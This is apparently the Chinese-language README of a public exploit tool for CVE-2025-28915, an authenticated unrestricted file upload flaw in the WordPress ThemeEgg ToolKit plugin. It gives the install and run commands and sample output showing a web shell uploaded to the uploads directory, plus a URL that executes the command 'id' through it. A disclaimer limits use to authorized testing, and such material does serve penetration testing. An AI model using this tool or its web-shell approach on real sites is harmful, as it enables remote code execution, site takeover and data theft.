WordPress ThemeEgg ToolKit 插件(版本 ≤ 1.2.9)存在一个无限制文件上传漏洞,允许经过身份验证的攻击者向服务器上传Web Shell。这可能导致远程代码执行(RCE)、完全接管网站以及泄露敏感数据。
本脚本通过以下步骤自动化利用 CVE-2025-28915:
requests、beautifulsoup4pip install requests beautifulsoup4
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
| 参数 | 描述 |
|---|---|
-u | 目标WordPress URL (例如 http://target.com/wordpress) |
-un | WordPress用户名 |
-p | WordPress密码 |
[+] 检测到易受攻击版本:1.2.9
[+] 成功登录。
[+] 找到安全随机数:f82467a997
[*] 正在上传Web Shell...
[+] Web Shell上传成功!
[+] 可能的Web Shell位置:http://target.com/wp-content/uploads/2025/03/shell.php
[*] 测试命令:http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
此脚本仅用于教育和授权的安全测试目的。未经授权的使用是非法的且不道德的。作者不对滥用行为承担任何责任。
作者:Khaled Alenazi (Nxploit)